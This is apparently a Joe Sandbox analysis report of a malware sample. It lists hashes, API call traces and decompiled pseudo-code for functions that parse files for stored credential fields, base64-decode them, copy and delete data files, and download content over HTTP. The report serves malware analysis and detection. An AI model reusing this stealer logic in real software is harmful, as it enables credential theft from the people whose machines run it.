Opcode ID: ac1a501cdbda92d70ea82fc89cedc036c1a3fcebaa1d84251d868b40488cc35a
Instruction ID: bbb8ed6d70345603446371c04fbf034af0d2bdd803a1e493b0e69b05095dac04
Opcode Fuzzy Hash: ac1a501cdbda92d70ea82fc89cedc036c1a3fcebaa1d84251d868b40488cc35a
Instruction Fuzzy Hash: 7BA14AB5A11214AFCB14EBA4ED88FDA77F9EB4C304F00C1A9F60993250C734A9A1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409060, Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 236
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00409060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				intOrPtr _v12;
				char* _v16;
				char _v284;
				char* _v288;
				void* _v292;
				char* _v296;
				struct _OVERLAPPED* _v300;
				long _v304;
				char* _v308;
				intOrPtr _t59;
				char* _t72;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t96;
				char* _t98;
				char* _t99;
				intOrPtr _t104;
				intOrPtr _t108;
				char* _t110;
				char* _t111;
				intOrPtr _t116;
				void* _t118;
				intOrPtr _t120;
				char* _t129;
				char* _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				char* _t136;
				char* _t140;
				intOrPtr _t147;
				char* _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t159;
				intOrPtr _t160;
				char* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				char* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;

				_t59 =  *0x41a81c(_a12);
				_t174 = _t173 + 4;
				if(_t59 == 0) {
					_t59 = E0040B650(__ecx, 0x41a7f0);
					_t175 = _t174 + 4;
					_v12 = _t59;
					if(_v12 < 0x20) {
						E0040B720( &_v284, 0x104);
						 *0x41aa24( &_v284, _a12);
						 *0x41aa24( &_v284, 0x414018);
						_t147 =  *0x41a7e4; // 0x2e4a408
						 *0x41aa24( &_v284, _t147);
						_v304 = 0;
						_v300 = 0;
						_v292 = CreateFileA( &_v284, 0x80000000, 1, 0, 3, 0, 0);
						if(_v292 == 0) {
							L7:
							return  *0x41a840();
						}
						SetFilePointer(_v292, 0, 0, 2);
						_v304 = GetFileSize(_v292, 0);
						SetFilePointer(_v292, 0, 0, 0);
						_t72 = E0040B590(_v292, _v304 + 1);
						_t176 = _t175 + 4;
						_v308 = _t72;
						_v16 = _v308;
						ReadFile(_v292, _v16, _v304,  &_v8, 0);
						while(1) {
							_t152 =  *0x41a170; // 0x2e4a2e8
							_v296 = StrStrA(_v16, _t152);
							_t182 = _v296;
							if(_v296 == 0) {
								break;
							}
							_t129 =  *0x41a170; // 0x2e4a2e8
							_t31 =  *0x41a908(_t129) + 3; // 0x3
							_v296 =  &(_v296[_t31]);
							_t130 =  *0x41a3b0; // 0x2e4a330
							_v288 = StrStrA(_v296, _t130) - 3;
							 *_v288 = 0;
							_t131 =  *0x41a334; // 0x2e49af8
							_t156 =  *0x41a838; // 0x0
							 *0x41aa24(_t156, _t131);
							_t132 =  *0x41a838; // 0x0
							 *0x41aa24(_t132, _a8);
							_t157 =  *0x41a838; // 0x0
							 *0x41aa24(_t157, "\n");
							_t88 =  *0x41a37c; // 0x2e49a78
							_t133 =  *0x41a838; // 0x0
							 *0x41aa24(_t133, _t88);
							_t90 =  *0x41a838; // 0x0
							 *0x41aa24(_t90, _a4);
							_t134 =  *0x41a838; // 0x0
							 *0x41aa24(_t134, "\n");
							_t159 =  *0x41a144; // 0x2e49bd8
							_t93 =  *0x41a838; // 0x0
							 *0x41aa24(_t93, _t159);
							_t160 =  *0x41a838; // 0x0
							 *0x41aa24(_t160, _v296);
							_t96 =  *0x41a838; // 0x0
							 *0x41aa24(_t96, "\n");
							_t136 =  *0x41a5b8; // 0x2e4b0c0
							_t98 = StrStrA(_v288 + 1, _t136);
							_t99 =  *0x41a5b8; // 0x2e4b0c0
							_t41 =  *0x41a908(_t99) + 3; // 0x3
							_v296 =  &(_t98[_t41]);
							_t163 =  *0x41a5b4; // 0x2e4b100
							_v288 = StrStrA(_v296, _t163) - 3;
							 *_v288 = 0;
							_t164 =  *0x41a06c; // 0x2e49c08
							_t104 =  *0x41a838; // 0x0
							 *0x41aa24(_t104, _t164);
							_t165 =  *0x41a838; // 0x0
							 *0x41aa24(_t165, E004077A0(_v296, _t182, _v296));
							_t108 =  *0x41a838; // 0x0
							 *0x41aa24(_t108, "\n");
							_t140 =  *0x41a5b4; // 0x2e4b100
							_t110 = StrStrA(_v288 + 1, _t140);
							_t111 =  *0x41a5b4; // 0x2e4b100
							_t49 =  *0x41a908(_t111) + 3; // 0x3
							_v296 =  &(_t110[_t49]);
							_t168 =  *0x41a70c; // 0x2e49da8
							_v288 = StrStrA(_v296, _t168) - 3;
							 *_v288 = 0;
							_t169 =  *0x41a14c; // 0x2e49c28
							_t116 =  *0x41a838; // 0x0
							 *0x41aa24(_t116, _t169);
							_t118 = E004077A0(_v296, _t182, _v296);
							_t176 = _t176 + 8;
							_t170 =  *0x41a838; // 0x0
							 *0x41aa24(_t170, _t118);
							_t120 =  *0x41a838; // 0x0
							 *0x41aa24(_t120, "\n\n");
							_v16 = _v288 + 1;
						}
						CloseHandle(_v292);
						goto L7;
					}
				}
				return _t59;
			}

0x0040906e
0x00409074
0x00409079
0x00409084
0x00409089
0x0040908c
0x00409093
0x004090a5
0x004090b5
0x004090c7
0x004090cd
0x004090db
0x004090e1
0x004090eb
0x00409111
0x0040911e
0x004093f3
0x00000000
0x004093f3
0x00409131
0x00409146
0x00409159
0x00409169
0x0040916e
0x00409171
0x0040917d
0x00409198
0x0040919e
0x0040919e
0x004091af
0x004091b5
0x004091bc
0x00000000
0x00000000
0x004091c2
0x004091d5
0x004091d9
0x004091df
0x004091f6
0x00409202
0x00409205
0x0040920c
0x00409213
0x0040921d
0x00409224
0x0040922f
0x00409236
0x0040923c
0x00409242
0x00409249
0x00409253
0x00409259
0x00409264
0x0040926b
0x00409271
0x00409278
0x0040927e
0x0040928b
0x00409292
0x0040929d
0x004092a3
0x004092a9
0x004092ba
0x004092c2
0x004092ce
0x004092d2
0x004092d8
0x004092ef
0x004092fb
0x004092fe
0x00409305
0x0040930b
0x00409321
0x00409328
0x00409333
0x00409339
0x0040933f
0x00409350
0x00409358
0x00409364
0x00409368
0x0040936e
0x00409385
0x00409391
0x00409394
0x0040939b
0x004093a1
0x004093ae
0x004093b3
0x004093b7
0x004093be
0x004093c9
0x004093cf
0x004093de
0x004093de
0x004093ed
0x00000000
0x004093ed
0x00409093
0x004093fd

APIs

lstrcat.KERNEL32(?,02E49180), ref: 004090B5
lstrcat.KERNEL32(?,00414018), ref: 004090C7
lstrcat.KERNEL32(?,02E4A408), ref: 004090DB
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040910B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00409131
GetFileSize.KERNEL32(00000000,00000000), ref: 00409140
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409159
new[].LIBCMTD ref: 00409169
ReadFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00409198
StrStrA.SHLWAPI(?,02E4A2E8), ref: 004091A9
lstrlen.KERNEL32(02E4A2E8), ref: 004091C9
StrStrA.SHLWAPI(00000000,02E4A330), ref: 004091ED
lstrcat.KERNEL32(00000000,02E49AF8), ref: 00409213
lstrcat.KERNEL32(00000000,?), ref: 00409224
lstrcat.KERNEL32(00000000,00418BC4), ref: 00409236
lstrcat.KERNEL32(00000000,02E49A78), ref: 00409249
lstrcat.KERNEL32(00000000,00000020), ref: 00409259
lstrcat.KERNEL32(00000000,00418BC4), ref: 0040926B
lstrcat.KERNEL32(00000000,02E49BD8), ref: 0040927E
lstrcat.KERNEL32(00000000,00000000), ref: 00409292
lstrcat.KERNEL32(00000000,00418BC4), ref: 004092A3
StrStrA.SHLWAPI(?,02E4B0C0), ref: 004092BA
lstrlen.KERNEL32(02E4B0C0), ref: 004092C8
StrStrA.SHLWAPI(00000000,02E4B100), ref: 004092E6
lstrcat.KERNEL32(00000000,02E49C08), ref: 0040930B

Part of subcall function 004077A0: lstrlen.KERNEL32(0040931D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004077EB
Part of subcall function 004077A0: CryptStringToBinaryA.CRYPT32(0040931D,00000000), ref: 004077F6

lstrcat.KERNEL32(00000000,00000000), ref: 00409328
lstrcat.KERNEL32(00000000,00418BC4), ref: 00409339
StrStrA.SHLWAPI(?,02E4B100), ref: 00409350
lstrlen.KERNEL32(02E4B100), ref: 0040935E
StrStrA.SHLWAPI(00000000,02E49DA8), ref: 0040937C
lstrcat.KERNEL32(00000000,02E49C28), ref: 004093A1

Part of subcall function 004077A0: lstrcat.KERNEL32(?,0041401A), ref: 004078B9
Part of subcall function 004077A0: lstrcat.KERNEL32(?,0041401A), ref: 004078CD
Part of subcall function 004077A0: lstrcat.KERNEL32(0041401A,0041401A), ref: 004078EE

lstrcat.KERNEL32(00000000,00000000), ref: 004093BE
lstrcat.KERNEL32(00000000,00418BC0), ref: 004093CF
CloseHandle.KERNEL32(00000000), ref: 004093ED

Strings

, xrefs: 0040908F

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$File$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringnew[]
String ID:
API String ID: 3141130001-3916222277
Opcode ID: 83493bb6aca1adf2ef6831467ff656548a40d202072a372698ec97d6f1694147
Instruction ID: 7e99e970e00657f65ab1c061739f90e233e970cfeaa3462852b2302322d486d4
Opcode Fuzzy Hash: 83493bb6aca1adf2ef6831467ff656548a40d202072a372698ec97d6f1694147
Instruction Fuzzy Hash: 58A11AB5A11204AFC715EBA4DD88FDA77F9EB4C304F00C5A9F60993291C738A9A1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D27FA0, Relevance: 45.3, APIs: 30, Instructions: 284stringmemoryfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02D27FB5
lstrcat.KERNEL32(?,00414018), ref: 02D27FC7

Part of subcall function 02D2BB00: GetSystemTime.KERNEL32(?,?,00000104), ref: 02D2BB21

lstrcat.KERNEL32(?,00000000), ref: 02D27FDF
CopyFileA.KERNEL32(00000000,?,00000001), ref: 02D27FF2
wsprintfA.USER32 ref: 02D2801F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D2806F
RtlAllocateHeap.NTDLL(00000000), ref: 02D28076
StrCmpCA.SHLWAPI(?,00418BE0), ref: 02D28122
lstrcat.KERNEL32(?,0041A48C), ref: 02D28149
lstrcat.KERNEL32(?,0041A15C), ref: 02D2816E
StrCmpCA.SHLWAPI(?,00418BE0), ref: 02D28180
lstrcat.KERNEL32(?,0041A48C), ref: 02D281A8
lstrcat.KERNEL32(?,0041A15C), ref: 02D281CE

Part of subcall function 02D27480: memset.MSVCRT ref: 02D274D2
Part of subcall function 02D27480: LocalAlloc.KERNEL32(00000040,?), ref: 02D27521
Part of subcall function 02D27480: lstrcat.KERNEL32(?,00000000), ref: 02D27587

lstrcat.KERNEL32(?,00418BE0), ref: 02D281FE
lstrcat.KERNEL32(?,?), ref: 02D28212
lstrcat.KERNEL32(?,004191EC), ref: 02D28224
lstrcat.KERNEL32(?,?), ref: 02D28238
lstrcat.KERNEL32(?,004191EC), ref: 02D2824A
lstrcat.KERNEL32(?,?), ref: 02D2825E
lstrcat.KERNEL32(?,004191EC), ref: 02D28270
lstrcat.KERNEL32(?,?), ref: 02D28284
lstrcat.KERNEL32(?,004191EC), ref: 02D28296
lstrcat.KERNEL32(?,?), ref: 02D282AA
lstrcat.KERNEL32(?,004191EC), ref: 02D282BC
lstrcat.KERNEL32(?,?), ref: 02D282D0
lstrcat.KERNEL32(?,004191EC), ref: 02D282E2
lstrcat.KERNEL32(?,00000000), ref: 02D28320
lstrcat.KERNEL32(?,00418BC4), ref: 02D28332
lstrlen.KERNEL32(?), ref: 02D28344
DeleteFileA.KERNEL32(?), ref: 02D28394

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAllocateCopyCurrentDeleteDirectoryLocalProcessSystemTimelstrlenmemsetwsprintf
String ID:
API String ID: 3067815791-0
Opcode ID: ffd5550d78d5c5cbcce8ec1d2f464851c7de5c2aa3a5bccb6b89eb1b96e4b4a3
Instruction ID: 55fde798e311653508e496ff799faea025aa87a2500ef7c585c7cf4f10a58c59
Opcode Fuzzy Hash: ffd5550d78d5c5cbcce8ec1d2f464851c7de5c2aa3a5bccb6b89eb1b96e4b4a3
Instruction Fuzzy Hash: 19B183B5A51118ABCB10EBA4DD8CFEA77B9AF4C704F008595F20597250C734EEA1CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00407D50, Relevance: 45.3, APIs: 30, Instructions: 284stringmemoryfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00407D65
lstrcat.KERNEL32(?,00414018), ref: 00407D77

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 00407D8F
CopyFileA.KERNEL32(00000000,?,00000001), ref: 00407DA2
wsprintfA.USER32 ref: 00407DCF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00407E1F
RtlAllocateHeap.NTDLL(00000000), ref: 00407E26
StrCmpCA.SHLWAPI(?,00418BE0), ref: 00407ED2
lstrcat.KERNEL32(?,02E49D18), ref: 00407EF9
lstrcat.KERNEL32(?,02E49CC8), ref: 00407F1E
StrCmpCA.SHLWAPI(?,00418BE0), ref: 00407F30
lstrcat.KERNEL32(?,02E49D18), ref: 00407F58
lstrcat.KERNEL32(?,02E49CC8), ref: 00407F7E

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00418BE0), ref: 00407FAE
lstrcat.KERNEL32(?,?), ref: 00407FC2
lstrcat.KERNEL32(?,004191EC), ref: 00407FD4
lstrcat.KERNEL32(?,?), ref: 00407FE8
lstrcat.KERNEL32(?,004191EC), ref: 00407FFA
lstrcat.KERNEL32(?,?), ref: 0040800E
lstrcat.KERNEL32(?,004191EC), ref: 00408020
lstrcat.KERNEL32(?,?), ref: 00408034
lstrcat.KERNEL32(?,004191EC), ref: 00408046
lstrcat.KERNEL32(?,?), ref: 0040805A
lstrcat.KERNEL32(?,004191EC), ref: 0040806C
lstrcat.KERNEL32(?,?), ref: 00408080
lstrcat.KERNEL32(?,004191EC), ref: 00408092
lstrcat.KERNEL32(?,00000000), ref: 004080D0
lstrcat.KERNEL32(?,00418BC4), ref: 004080E2
lstrlen.KERNEL32(?), ref: 004080F4
DeleteFileA.KERNEL32(?), ref: 00408144

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAllocateCopyCurrentDeleteDirectoryLocalProcessSystemTimelstrlenmemsetwsprintf
String ID:
API String ID: 3067815791-0
Opcode ID: 44fd675b5e8f644ed4ffe8ab9f9041a44a66e566d68b538c606c3f53ab211c74
Instruction ID: 0472a7c7585205d9353b1484faec9d34f3986521201bc2a8f856e71ef692a447
Opcode Fuzzy Hash: 44fd675b5e8f644ed4ffe8ab9f9041a44a66e566d68b538c606c3f53ab211c74
Instruction Fuzzy Hash: 0CB197B5A41108BBCB10DBA4DD8DFEA77B8AF4C704F008599F205A7181C739EA61CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D28E50, Relevance: 33.3, APIs: 22, Instructions: 284stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D28E7F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D28ECC
RtlAllocateHeap.NTDLL(00000000), ref: 02D28ED3
lstrcat.KERNEL32(?,0041A48C), ref: 02D2903A
lstrcat.KERNEL32(?,0041A15C), ref: 02D29060
lstrcat.KERNEL32(?,0041A48C), ref: 02D29118
lstrcat.KERNEL32(?,0041A15C), ref: 02D2913E
lstrcat.KERNEL32(?,?), ref: 02D29152
lstrcat.KERNEL32(?,004191EC), ref: 02D29164
lstrcat.KERNEL32(?,?), ref: 02D29178
lstrcat.KERNEL32(?,004191EC), ref: 02D2918A
lstrcat.KERNEL32(?,?), ref: 02D2919E
lstrcat.KERNEL32(?,004191EC), ref: 02D291B0
lstrcat.KERNEL32(?,?), ref: 02D291C4
lstrcat.KERNEL32(?,004191EC), ref: 02D291D6
lstrcat.KERNEL32(?,?), ref: 02D291EA
lstrcat.KERNEL32(?,004191EC), ref: 02D291FC
lstrcat.KERNEL32(?,?), ref: 02D29210
lstrcat.KERNEL32(?,004191EC), ref: 02D29222
lstrcat.KERNEL32(?,?), ref: 02D29236
lstrcat.KERNEL32(?,00418BC4), ref: 02D29248
lstrlen.KERNEL32(?), ref: 02D2925A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: b972705f4d408f59d57428f6ec2d7c38fe99164d5a1f279b6c3d9cc0b8fe5810
Instruction ID: 6f411945d4e26affc1598df7e2bac7d8919a3710d0b3f0e7b3a8fbbf725d046c
Opcode Fuzzy Hash: b972705f4d408f59d57428f6ec2d7c38fe99164d5a1f279b6c3d9cc0b8fe5810
Instruction Fuzzy Hash: BDC171B1A01228AFCB24DF64DD89BDE77B5AF48708F0081D9F209A7290C7359E94CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00408C00, Relevance: 33.3, APIs: 22, Instructions: 284stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00408C2F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408C7C
RtlAllocateHeap.NTDLL(00000000), ref: 00408C83
lstrcat.KERNEL32(?,02E49D18), ref: 00408DEA
lstrcat.KERNEL32(?,02E49CC8), ref: 00408E10
lstrcat.KERNEL32(?,02E49D18), ref: 00408EC8
lstrcat.KERNEL32(?,02E49CC8), ref: 00408EEE
lstrcat.KERNEL32(?,?), ref: 00408F02
lstrcat.KERNEL32(?,004191EC), ref: 00408F14
lstrcat.KERNEL32(?,?), ref: 00408F28
lstrcat.KERNEL32(?,004191EC), ref: 00408F3A
lstrcat.KERNEL32(?,?), ref: 00408F4E
lstrcat.KERNEL32(?,004191EC), ref: 00408F60
lstrcat.KERNEL32(?,?), ref: 00408F74
lstrcat.KERNEL32(?,004191EC), ref: 00408F86
lstrcat.KERNEL32(?,?), ref: 00408F9A
lstrcat.KERNEL32(?,004191EC), ref: 00408FAC
lstrcat.KERNEL32(?,?), ref: 00408FC0
lstrcat.KERNEL32(?,004191EC), ref: 00408FD2
lstrcat.KERNEL32(?,?), ref: 00408FE6
lstrcat.KERNEL32(?,00418BC4), ref: 00408FF8
lstrlen.KERNEL32(?), ref: 0040900A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: dacc5b97372733a4ba00ccc95a0c1e16af46acb8b8fedb2f4d0e5c5a2b3d8658
Instruction ID: 37d9e65b1a1885b2021265d91926de593cb986df4567ec96dbdd6e639e599f41
Opcode Fuzzy Hash: dacc5b97372733a4ba00ccc95a0c1e16af46acb8b8fedb2f4d0e5c5a2b3d8658
Instruction Fuzzy Hash: A6C164B1A01218AFCB24DF64DD89BDE77B5AF48704F0081D9F609A7291CB399E90CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02D27D10, Relevance: 31.7, APIs: 21, Instructions: 174stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,?,02D28AFE,?,?,0041ABAC,00000000,00000000), ref: 02D27D29
lstrcat.KERNEL32(?,00414018), ref: 02D27D3B

Part of subcall function 02D2BB00: GetSystemTime.KERNEL32(?,?,00000104), ref: 02D2BB21

lstrcat.KERNEL32(?,00000000), ref: 02D27D53
CopyFileA.KERNEL32(?,?,00000001), ref: 02D27D66
DeleteFileA.KERNEL32(?), ref: 02D27F8C

Part of subcall function 02D27480: memset.MSVCRT ref: 02D274D2
Part of subcall function 02D27480: LocalAlloc.KERNEL32(00000040,?), ref: 02D27521
Part of subcall function 02D27480: lstrcat.KERNEL32(?,00000000), ref: 02D27587

lstrcat.KERNEL32(?,00000000), ref: 02D27E47
lstrcat.KERNEL32(0041A838,0041A334), ref: 02D27E5B
lstrcat.KERNEL32(0041A838,?), ref: 02D27E6C
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D27E7E
lstrcat.KERNEL32(0041A838,0041A37C), ref: 02D27E91
lstrcat.KERNEL32(0041A838,?), ref: 02D27EA1
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D27EB3
lstrcat.KERNEL32(0041A838,0041A144), ref: 02D27EC6
lstrcat.KERNEL32(0041A838,?), ref: 02D27EDA
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D27EEB
lstrcat.KERNEL32(0041A838,0041A06C), ref: 02D27EFF
lstrcat.KERNEL32(0041A838,?), ref: 02D27F13
lstrcat.KERNEL32(0041A838,00418BC4), ref: 02D27F25
lstrcat.KERNEL32(0041A838,0041A14C), ref: 02D27F38
lstrcat.KERNEL32(0041A838,?), ref: 02D27F4B
lstrcat.KERNEL32(0041A838,00418BC0), ref: 02D27F5D

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$File$AllocCopyCurrentDeleteDirectoryLocalSystemTimememset
String ID:
API String ID: 3522136165-0
Opcode ID: 2e624d91b4c54302e4a69fc95ab7cc2408cdea3b369d4b7b1ddfcb14965c28a0
Instruction ID: 33f98e76ab36ce1b65769d69b6c387d41e18bb7fd017a6307d383f4e64a85ce5
Opcode Fuzzy Hash: 2e624d91b4c54302e4a69fc95ab7cc2408cdea3b369d4b7b1ddfcb14965c28a0
Instruction Fuzzy Hash: 8C6140B1611104AFD714EBA4EE48DEA37F9EF4C305F008569F60983261D778EA61CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407AC0, Relevance: 31.7, APIs: 21, Instructions: 174stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,?,004088AE,?,?,00000000,00000000,00000000), ref: 00407AD9
lstrcat.KERNEL32(?,00414018), ref: 00407AEB

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 00407B03
CopyFileA.KERNEL32(?,?,00000001), ref: 00407B16
DeleteFileA.KERNEL32(?), ref: 00407D3C

Part of subcall function 00407230: memset.MSVCRT ref: 00407282
Part of subcall function 00407230: LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
Part of subcall function 00407230: lstrcat.KERNEL32(?,00000000), ref: 00407337

lstrcat.KERNEL32(?,00000000), ref: 00407BF7
lstrcat.KERNEL32(00000000,02E49AF8), ref: 00407C0B
lstrcat.KERNEL32(00000000,?), ref: 00407C1C
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C2E
lstrcat.KERNEL32(00000000,02E49A78), ref: 00407C41
lstrcat.KERNEL32(00000000,?), ref: 00407C51
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C63
lstrcat.KERNEL32(00000000,02E49BD8), ref: 00407C76
lstrcat.KERNEL32(00000000,?), ref: 00407C8A
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407C9B
lstrcat.KERNEL32(00000000,02E49C08), ref: 00407CAF
lstrcat.KERNEL32(00000000,?), ref: 00407CC3
lstrcat.KERNEL32(00000000,00418BC4), ref: 00407CD5
lstrcat.KERNEL32(00000000,02E49C28), ref: 00407CE8
lstrcat.KERNEL32(00000000,?), ref: 00407CFB
lstrcat.KERNEL32(00000000,00418BC0), ref: 00407D0D

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$File$AllocCopyCurrentDeleteDirectoryLocalSystemTimememset
String ID:
API String ID: 3522136165-0
Opcode ID: f3fd52fb4761c2a2e1c00ae7afb32f507db36117f99e1080e622c3acfdb5aeba
Instruction ID: ab0808fcc5ae4ac9d31269b52e8e6387a8d9148f66a13944e02c84bb448b15ba
Opcode Fuzzy Hash: f3fd52fb4761c2a2e1c00ae7afb32f507db36117f99e1080e622c3acfdb5aeba
Instruction Fuzzy Hash: 6C6152B1A11104AFC710EBA4EE49DEA37F8EF4C305F008569F60593161D778EA61CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172
networksleepfileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004051A0(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, char* _a16) {
				void* _v8;
				DWORD* _v12;
				char _v2012;
				void* _v2016;
				void* _v2020;
				long _v2024;
				void _v2284;
				void _v2288;
				DWORD* _v2292;
				DWORD* _v2296;
				void _v4300;
				int _v4304;
				long _v4308;
				DWORD* _t104;
				void* _t107;

				_t85 = __ecx;
				E004139B0(0x10d0, __ecx);
				E0040B6E0(_t85,  &_v2012, 0, 0x7d0);
				_v2020 = InternetOpenA(0x41401a, 0, 0, 0, 0);
				_v2024 = 0x100;
				_v12 = 0;
				_push("https://");
				_push(_a4);
				if( *0x41aa4c() == 0) {
					_v12 = 1;
				}
				if(_v2020 != 0) {
					_v2288 = 0x927c0;
					InternetSetOptionA(_v2020, 6,  &_v2288, 4);
					if(_v12 == 0) {
						_v2016 = InternetConnectA(_v2020, _a8, 0x50, 0, 0, 3, 0, 0);
					} else {
						_v2016 = InternetConnectA(_v2020, _a8, 0x1bb, 0, 0, 3, 0, 0);
					}
					if(_v2016 != 0) {
						if(_v12 == 0) {
							_v8 = HttpOpenRequestA(_v2016, _a16, _a12, 0, 0, 0, 0x400100, 0);
						} else {
							_v8 = HttpOpenRequestA(_v2016, _a16, _a12, 0, 0, 0, 0xc00100, 0);
						}
						if(_v8 != 0) {
							_v2292 = 0;
							_v2296 = 0;
							while(_v2296 < 6) {
								HttpSendRequestA(_v8, 0, 0, 0, 0);
								if(HttpQueryInfoA(_v8, 0x13,  &_v2284,  &_v2024, 0) == 0) {
									L17:
									Sleep(0x7530);
									_t104 =  &(_v2296[0]);
									__eflags = _t104;
									_v2296 = _t104;
									continue;
								} else {
									_push("200");
									_push( &_v2284);
									if( *0x41aa4c() != 0) {
										goto L17;
									} else {
										_v2292 = 1;
									}
								}
								break;
							}
							if(_v2292 != 0) {
								while(1) {
									_v4304 = InternetReadFile(_v8,  &_v4300, 0x7cf,  &_v4308);
									if(_v4304 == 0) {
										break;
									}
									_t122 = _v4308;
									if(_v4308 != 0) {
										 *((char*)(_t107 + _v4308 - 0x10c8)) = 0;
										 *0x41aa24( &_v2012,  &_v4300);
										continue;
									}
									break;
								}
							}
						}
						InternetCloseHandle(_v8);
					}
					InternetCloseHandle(_v2016);
				}
				InternetCloseHandle(_v2020);
				return E00404830(_v2020, _t122,  &_v2012);
			}

0x004051a0
0x004051a8
0x004051bb
0x004051d3
0x004051d9
0x004051e3
0x004051ea
0x004051f2
0x004051fb
0x004051fd
0x004051fd
0x0040520b
0x00405211
0x0040522d
0x00405237
0x0040527e
0x00405239
0x00405259
0x00405259
0x0040528b
0x00405295
0x004052e0
0x00405297
0x004052b9
0x004052b9
0x004052e7
0x004052ed
0x004052f7
0x00405312
0x00405327
0x0040534b
0x0040536f
0x00405374
0x00405309
0x00405309
0x0040530c
0x00000000
0x0040534d
0x0040534d
0x00405358
0x00405361
0x00000000
0x00405363
0x00405363
0x00405363
0x00405361
0x00000000
0x0040534b
0x00405383
0x00405385
0x004053a2
0x004053af
0x00000000
0x00000000
0x004053b1
0x004053b8
0x004053c2
0x004053d8
0x00000000
0x004053d8
0x00000000
0x004053b8
0x004053ba
0x00405383
